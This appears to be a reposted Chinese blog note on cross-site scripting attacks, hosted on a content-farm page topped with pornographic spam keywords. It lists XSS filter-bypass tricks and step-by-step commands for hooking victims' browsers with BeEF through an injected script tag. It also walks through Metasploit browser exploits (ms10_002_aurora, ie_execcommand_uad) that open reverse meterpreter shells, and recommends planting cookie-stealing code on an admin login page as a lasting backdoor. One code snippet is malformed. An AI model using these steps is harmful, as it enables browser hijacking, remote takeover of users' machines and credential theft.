日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

网络安全-XSS笔记

發布時間:2025/4/5 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 网络安全-XSS笔记 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

XSS繞過限制:
1、繞過magic_quotes_gpc
可使用javascript中的String.fromCharCode()
<script>String.fromCharCode()</scrip>
2、HEX編碼
十六進制編碼
https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
https://www.asciitohex.com/
3、改變大小寫
4、關閉標簽
5、AWVS 掃描

Kali Linux Beef劫持客戶端瀏覽器:
cd /usr/share/beef-xss 進入目錄
ls 查看目錄
./beef 運行beef
UI URL:管理 網址瀏覽器打開 賬號密碼默認beef
Hook URL: 惡意代碼
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser

beef+msf拿客戶端shell (ie6 xp)
cd /usr/share/beef-xss 進入目錄
./ beef 運行beef
msfconsole 運行msf

msf下執行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 客戶端將要訪問的IP
set SRVPORT 將要訪問的端口
set URIPATH / 網站根目錄
set LHOST 客戶端回連IP
set LPORT 客戶端回連端口
exploit

Using URL 為要讓客戶端訪問的url,beef里設置

session -i 查看得到的shell
session -1 id 查看固定id的shell

shell 拿到權限

beef+msf拿客戶端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回連ip
set SRVPORT 回連端口
set URIPATH /
exploit

XSS漏洞掃描工具
WVS
椰樹
safe3
Xelenium
w3af
vega
xss掃描插件+burp

長期留后門,可將XSS獲取cookie代碼留在管理登錄頁面

Xss平臺搭建
使用工具:
wamp2.2+xss.me源碼

轉載于:https://blog.51cto.com/3945465/2140843

總結

以上是生活随笔為你收集整理的网络安全-XSS笔记的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。